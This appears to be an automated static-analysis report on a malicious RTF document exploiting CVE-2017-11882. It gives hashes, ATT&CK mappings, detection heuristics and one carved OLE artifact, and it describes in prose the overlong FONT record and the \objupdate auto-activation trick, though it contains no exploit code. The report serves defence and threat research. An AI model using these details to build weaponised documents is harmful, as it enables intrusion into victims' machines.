Malicious RTF — malware analysis report

Static analysis result for SHA-256 de651239f0fd4c67…

MALICIOUS

RTF

11.8 KB First seen: 2019-09-30
MD5: ccaef12605d6833f63ae41a0893f4798 SHA-1: cbdef6486423fc463d40c50c6463ea599b3a6de5 SHA-256: de651239f0fd4c670e91adda965c76b9fe1234937418b52383619bf5905c20eb
180 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The RTF file contains critical heuristic firings indicating the exploitation of CVE-2017-11882 via the Equation Editor. This vulnerability allows for arbitrary code execution, which is a common method for delivering secondary malware payloads. The presence of OLE object data and the ".objupdate" directive further support the exploitation of embedded objects for malicious purposes.

Heuristics 4

  • Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • CVE-2017-11882 — Equation Editor FONT record overflow critical CVE likely CVE_2017_11882
    Equation Editor MTEF contains an overlong FONT typeface field, the vulnerable copy primitive for CVE-2017-11882. This is stronger evidence than the Equation Editor CLSID alone because it identifies the malformed record that drives code execution in EQNEDT32.EXE.
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data medium RTF_OBJDATA
    RTF contains 1 \objdata section(s) — embedded OLE objects

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off00000937.bin rtf-objdata-decoded RTF \objdata at offset 0x937 4653 bytes
SHA-256: b647a4fbf24f2828d65fcd5b93e88bb2d237aa21f05f01fafa4ca22b27095a5c